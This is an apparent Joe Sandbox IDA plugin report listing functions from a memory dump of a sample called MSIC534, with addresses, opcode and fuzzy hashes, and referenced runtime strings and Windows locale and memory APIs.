Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
API String ID: 593203224-1108341528
Opcode ID: 23437879f8f8bbbd83cd7ef2506f5276b2d79456625c569b7ff5b62d3da9fe65
Instruction ID: f3d31817b770d44af5cd4dae8cbbd78f8e147214968f3e14da8a71820a056fa1
Opcode Fuzzy Hash: 23437879f8f8bbbd83cd7ef2506f5276b2d79456625c569b7ff5b62d3da9fe65
Instruction Fuzzy Hash: 28F29FA6A09B8685EB648F1AD05027D77B0FB51BC4F949132EA4E877A1DF3DE871D300

Function 00007FF6D9C0389C Relevance: 4.1, Strings: 2, Instructions: 1636COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6D9C04D13
0123456789ABCDEFabcdef-+XxPp, xrefs: 00007FF6D9C038FB, 00007FF6D9C03EB1, 00007FF6D9C040DC, 00007FF6D9C0461A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
API String ID: 593203224-1108341528
Opcode ID: 1cff6a44de0b6a38148b453d4f792d451d2ba385b103e0bad3ab4c52e6c7189a
Instruction ID: 1d4c764f1b18511a9241f36e68ecb1df44d08320f81c1447d52507e63cf9aec5
Opcode Fuzzy Hash: 1cff6a44de0b6a38148b453d4f792d451d2ba385b103e0bad3ab4c52e6c7189a
Instruction Fuzzy Hash: BEF280A2A09A8589EB558F2BC15037D37B1AB51BC8F548132DB5D877A1EF3DE876C300

Function 00007FF6D9C138EC Relevance: 3.8, Strings: 2, Instructions: 1270COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6D9C14900
0123456789-, xrefs: 00007FF6D9C13A9D, 00007FF6D9C13C8A, 00007FF6D9C13F5A, 00007FF6D9C1416E

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: $0123456789-
API String ID: 3382485803-700845222
Opcode ID: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
Instruction ID: 635edce73a41d631091de22295b25b340f81b6a75edb577eaaebfa61f80e99ac
Opcode Fuzzy Hash: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
Instruction Fuzzy Hash: BAC27C62A08A4685EB54CF16D49027D67B0FB46BC8F949033DE4E97BA8DF3DD8A1C304

Function 00007FF6D9C22804 Relevance: 3.7, Strings: 2, Instructions: 1199COMMON

Download Yara Rule

Strings

0123456789-, xrefs: 00007FF6D9C229B0, 00007FF6D9C22B80, 00007FF6D9C22E24, 00007FF6D9C23005
, xrefs: 00007FF6D9C23701

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: $0123456789-
API String ID: 593203224-700845222
Opcode ID: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
Instruction ID: f24ca573806571441e2983827bf234bfc96af54344ac1af17b3f251187d0b9d8
Opcode Fuzzy Hash: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
Instruction Fuzzy Hash: D9C24C62A08A8589EB648F25C4903BC7771FB45FC8F946032DA5E8B7A5DF3DD8A5C340

Function 00007FF6D9C41430 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF6D9C3D666), ref: 00007FF6D9C414A9

Part of subcall function 00007FF6D9C40F78: VirtualProtect.KERNELBASE ref: 00007FF6D9C41095
Part of subcall function 00007FF6D9C40F78: VirtualProtect.KERNELBASE ref: 00007FF6D9C410C6

Strings

GetLocaleInfoEx, xrefs: 00007FF6D9C41461, 00007FF6D9C4146F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ProtectVirtual$InfoLocale
String ID: GetLocaleInfoEx
API String ID: 3721377114-2904428671
Opcode ID: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
Instruction ID: 31b131b9b3f6b974f08d02bef641d64aae098b967bbacfb69123fe9899644f67
Opcode Fuzzy Hash: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
Instruction Fuzzy Hash: BC018420B0864641EA509F16A40047DA7B1AFA9BE0F544237DE5D877E6DE3CF5218780

Function 00007FF6D9C080A0 Relevance: 3.5, APIs: 2, Instructions: 461COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C0834D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C0860D

Part of subcall function 00007FF6D9C39C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C39C6F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
String ID:
API String ID: 1283921372-0
Opcode ID: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
Instruction ID: b2d5d81bd36eb9cd6db509cad497ef65f38305d18193441cbdc402b57909c8f7
Opcode Fuzzy Hash: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
Instruction Fuzzy Hash: CE02F1A2F19A848AFB208F66D8503FD2371AB597D8F448332EE5C97B99DE3CD1518340

Function 00007FF6D9C1F5C0 Relevance: 3.5, APIs: 2, Instructions: 456COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1F86F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1FB2F

Part of subcall function 00007FF6D9C39C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C39C6F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
String ID:
API String ID: 1283921372-0
Opcode ID: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
Instruction ID: 2f2a2bd71b4c3186243e1028387bc5241afabc0f1cd20b1fdd2b7a63fd88858b
Opcode Fuzzy Hash: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
Instruction Fuzzy Hash: DD02FF62B18A848AFB108F65D8503FD23B1EB567D8F448332EE5DA7BD9EE2CD1518344

Function 00007FF6D9C38AA8 Relevance: 2.8, Strings: 2, Instructions: 347COMMONLIBRARYCODE

Download Yara Rule

Strings

a/p, xrefs: 00007FF6D9C38DB8
am/pm, xrefs: 00007FF6D9C38D4D

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID: a/p$am/pm
API String ID: 0-3206640213
Opcode ID: 438b8e3391503fb9951029006b54b7e8068a38d419b57045a4fe6ea7fcdb07ce
Instruction ID: 6d093676c3d06808790fe8925a394c7b74bc7960d1daf52ef5b2d77e07a1ae22
Opcode Fuzzy Hash: 438b8e3391503fb9951029006b54b7e8068a38d419b57045a4fe6ea7fcdb07ce
Instruction Fuzzy Hash: D4E1AE22A0864286EB749FB594542BD23B2FF587C4F558533EA0E87AD8DF3CE961C300

Function 00007FF6D9C3F2D0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF6D9C3F3DD
gfff, xrefs: 00007FF6D9C3F45A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 011e795fb9bf1fe48c8b96f5bd64963dfe1e97779e8fd65820847a8dd4772f89
Instruction ID: 2a287c95c68829798728fbacf3f0373c9bfb5252302c36dcdfec1f324d47ed19
Opcode Fuzzy Hash: 011e795fb9bf1fe48c8b96f5bd64963dfe1e97779e8fd65820847a8dd4772f89
Instruction Fuzzy Hash: A7516762B186C546F7658F36980076D7BB1E748BD4F488633CBAC8BAD6CE3DE4548B00

Function 00007FF6D9C0EEDC Relevance: 2.1, Strings: 1, Instructions: 812COMMON

Download Yara Rule

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00007FF6D9C0EF88, 00007FF6D9C0F5E9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 593203224-2799312399
Opcode ID: 9a49191a50288544803617f672c3eab9da9a77a755532826adaf78feedd35dca
Instruction ID: 76483b913230de6a1cddb8519919ac0a50b9d7efcb69b9d0d6d82e91be2a10c4
Opcode Fuzzy Hash: 9a49191a50288544803617f672c3eab9da9a77a755532826adaf78feedd35dca
Instruction Fuzzy Hash: B5724EA6B09A8685EB518F2AC05027C37B1EB40FC8F549033DE4E9B7A5DE3DD8A5D350

Function 00007FF6D9C0E468 Relevance: 2.1, Strings: 1, Instructions: 806COMMON

Download Yara Rule

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00007FF6D9C0E514, 00007FF6D9C0EB75

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 3382485803-2799312399
Opcode ID: 75eec2c592aeb8d5a85c63aa0f3a653fdae2001c8bccde947de1640178a9a200
Instruction ID: 073fc0e3b92a2688b5543d97510a7b4f2024d0b7b116442ef54932390346d7eb
Opcode Fuzzy Hash: 75eec2c592aeb8d5a85c63aa0f3a653fdae2001c8bccde947de1640178a9a200
Instruction Fuzzy Hash: 02726EA6A48A8685EB608F2AD05027C77B1FB40FC8F549033DE4E9B7A5DE3DD861D350

Function 00007FF6D9C04DB4 Relevance: 2.0, Strings: 1, Instructions: 775COMMON

Download Yara Rule

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 00007FF6D9C04E59, 00007FF6D9C05457

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 593203224-2799312399
Opcode ID: b37127e4aad4c4b3dc5ee089604c8ad0a44b676b1f83e5ae15dec5ce963cb7b9
Instruction ID: a01da6c9aef698677324cc089536b74d2ea3442abe60ea7a99f9c17940239076
Opcode Fuzzy Hash: b37127e4aad4c4b3dc5ee089604c8ad0a44b676b1f83e5ae15dec5ce963cb7b9
Instruction Fuzzy Hash: CE7260A2A09A858AEB518FABC05037C37B1AB51FD8F548133CA4D9B3A5DF3DD865C350

Function 00007FF6D9C3AB40 Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF6D9C3AC95

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 189df7a0d5afd0ef7f6deeb390458cedfcb3438f37d4f19d6cfbd7c090e291c2
Instruction ID: ef4f805126551415a8f6e2b1b071496c96129ac36fa2bc5b396a964d9e852d9d
Opcode Fuzzy Hash: 189df7a0d5afd0ef7f6deeb390458cedfcb3438f37d4f19d6cfbd7c090e291c2
Instruction Fuzzy Hash: EF028B62A08BC186E751DF3994512FD73B0FB58788F45923ADB9C87692EF38E1A5C700

Function 00007FF6D9C460A0 Relevance: 1.8, APIs: 1, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5102861b4e01de12da26c2ae3c3a4ce8dfeea83b3d3e6353534988ecc4bc1b17
Instruction ID: 118bca07736d3283ef97532fd4d826a0d694b16d15e5ee34ab8f441bb7b7a88d
Opcode Fuzzy Hash: 5102861b4e01de12da26c2ae3c3a4ce8dfeea83b3d3e6353534988ecc4bc1b17
Instruction Fuzzy Hash: 27E14C22B04B8586E720DF61E5502EE67B4FB987C8F404636DB8D93B56EF38E255C740

Function 00007FF6D9C1A4E0 Relevance: 1.8, APIs: 1, Instructions: 330COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9C1159C: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C115B1

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1A7F1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LockitLockit::__invalid_parameter_noinfo_noreturnstd::_
String ID:
API String ID: 3145298356-0
Opcode ID: 706e233060a5830de7f93fb97a70e7d9b0585a127fdda33efc4d4c10d0d599f6
Instruction ID: 84326bfd2e4538cb6ceac926b774e90224637ff56ef94bd5dc80699c17c8fba2
Opcode Fuzzy Hash: 706e233060a5830de7f93fb97a70e7d9b0585a127fdda33efc4d4c10d0d599f6
Instruction Fuzzy Hash: CCD17962B08B468AFB10CFA5D4502AD37B1BB49BC8F448132DE4DA77A9EF38D565C344

Function 00007FF6D9C427C0 Relevance: 1.7, APIs: 1, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF6D9C42A10

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 98d6bb8ec4d8016ca5be2b46351b761a86428196a239938b46cd90c15da02aa6
Instruction ID: d75998b3e5ede5ceded54355bf24289aac20dab06964587da2570b52c198df33
Opcode Fuzzy Hash: 98d6bb8ec4d8016ca5be2b46351b761a86428196a239938b46cd90c15da02aa6
Instruction Fuzzy Hash: 0AB1FF73604B858BE7598F69C44636C77B0F744BA8F148A26DA6E877E4CF39E461CB00

Function 00007FF6D9C313E8 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF6D9C3159F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 539f6e1b2e5c6e546089afd7eb16296cc36714faba7fe5d0cd695467402e10ed
Instruction ID: ba37692ccba6cada5238c7a249d930237ce3008f693b8f93808cea7132f8f369
Opcode Fuzzy Hash: 539f6e1b2e5c6e546089afd7eb16296cc36714faba7fe5d0cd695467402e10ed
Instruction Fuzzy Hash: 87E1B276A0864689EB658F38C45427C27B1EB47BD8F288237CA5E877D5CF39E861C350

Function 00007FF6D9C482D0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C48338

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6561236546b80c929474212d425a040ae5b7b2b765a597ade3fbb2eca490ffd7
Instruction ID: d103e89d7ab4a29e7a768af65a8568b340934543f5cd0b9affaeeb1573c4eb59
Opcode Fuzzy Hash: 6561236546b80c929474212d425a040ae5b7b2b765a597ade3fbb2eca490ffd7
Instruction Fuzzy Hash: 94311A32B0868286EB649F25E8513AE63B1BB8C784F449136DA5DD3696DF3CF5618B00

Function 00007FF6D9C47F18 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6D9C48725,00000000,00000092,?,?,00000000,?,?,00007FF6D9C3D493), ref: 00007FF6D9C47FB6

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 47b944eeafb250c54d068d10f20b40a869fc240e3044a791ad7e753f5ce3764d
Instruction ID: 83505fe983c0ea73e8d5bbfa681a1dcf029e172fee78cbff8de7efdf77167145
